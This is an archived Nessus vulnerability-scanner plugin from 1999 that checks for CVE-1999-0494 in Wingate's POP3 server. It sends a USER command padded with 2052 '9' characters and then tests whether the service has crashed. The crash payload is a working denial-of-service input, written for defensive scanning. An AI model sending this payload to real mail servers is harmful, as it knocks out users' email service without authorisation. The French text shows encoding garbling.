home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / wingate_user.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  97 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. #
  5. # See the Nessus Scripts License for details
  6. #
  7.  
  8. if(description)
  9. {
  10.  script_id(10311);
  11. script_cve_id("CVE-1999-0494");
  12.  script_version ("$Revision: 1.16 $");
  13.  
  14.  
  15.  name["english"] = "Wingate POP3 USER overflow";
  16.  name["francais"] = "Wingate POP3 USER overflow";
  17.  script_name(english:name["english"],
  18.           francais:name["francais"]);
  19.  
  20.  desc["english"] = "The remote POP3 server,
  21. which is probably part of Wingate, could
  22. be crashed with the following command :
  23.  
  24.         USER x#999(...)999
  25.         
  26. This problem may prevent users on your
  27. network from retrieving their emails.
  28.         
  29. Solution : Upgrade.
  30.  
  31. Risk factor : Medium";
  32.  
  33.  desc["francais"] = "Le serveur pop3 distant,
  34. appartenant probablement α WinGate, a
  35. pu Ωtre plantΘ avec la commande suivante :
  36.  
  37.         USER x#999(...)999
  38.  
  39. Ce probleme peut empecher les utilisateurs
  40. de votre rΘseau de relever leur courrier,
  41. les empechant ainsi de travailler normallement.
  42.  
  43. Solution : Mettez α jour votre Wingate.
  44.  
  45. Facteur de risque : Moyen";
  46.  
  47.  script_description(english:desc["english"],
  48.              francais:desc["francais"]);
  49.  
  50.  summary["english"] = "Determines if Wingate POP3 server can be crashed"; 
  51.  summary["francais"] = "Determine si wingate pop3 peut Ωtre plantΘ";
  52.  script_summary(english:summary["english"],
  53.          francais:summary["francais"]);
  54.  
  55.  script_category(ACT_DENIAL);
  56.  
  57.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  58.            francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  59.  
  60.  family["english"] = "Denial of Service"; 
  61.  family["francais"] = "DΘni de service";
  62.  
  63.  script_family(english:family["english"],
  64.             francais:family["francais"]);
  65.  script_dependencie("find_service.nes", "qpopper.nasl");
  66.  script_exclude_keys("pop3/false_pop3");
  67.  script_require_ports("Services/pop3", 110);
  68.  exit(0);
  69. }
  70.  
  71. #
  72. # The script code starts here
  73. #
  74.  
  75. fake = get_kb_item("pop3/false_pop3");
  76. if(fake)exit(0);
  77.  
  78. port = get_kb_item("Services/pop3");
  79. if(!port) port = 110;
  80.  
  81. if(get_port_state(port))
  82. {
  83. soc = open_sock_tcp(port);
  84. if(soc)
  85. {
  86.  buffer = recv_line(socket:soc, length:1024);
  87.  if(!buffer)exit(0);
  88.  s = string("USER x#", crap(length:2052, data:"9"), "\r\n");
  89.  send(socket:soc, data:s);
  90.  close(soc);
  91.  
  92.  soc2 = open_sock_tcp(port);
  93.  if(!soc2)security_warning(port);
  94.  else close(soc2);
  95. }
  96. }
  97.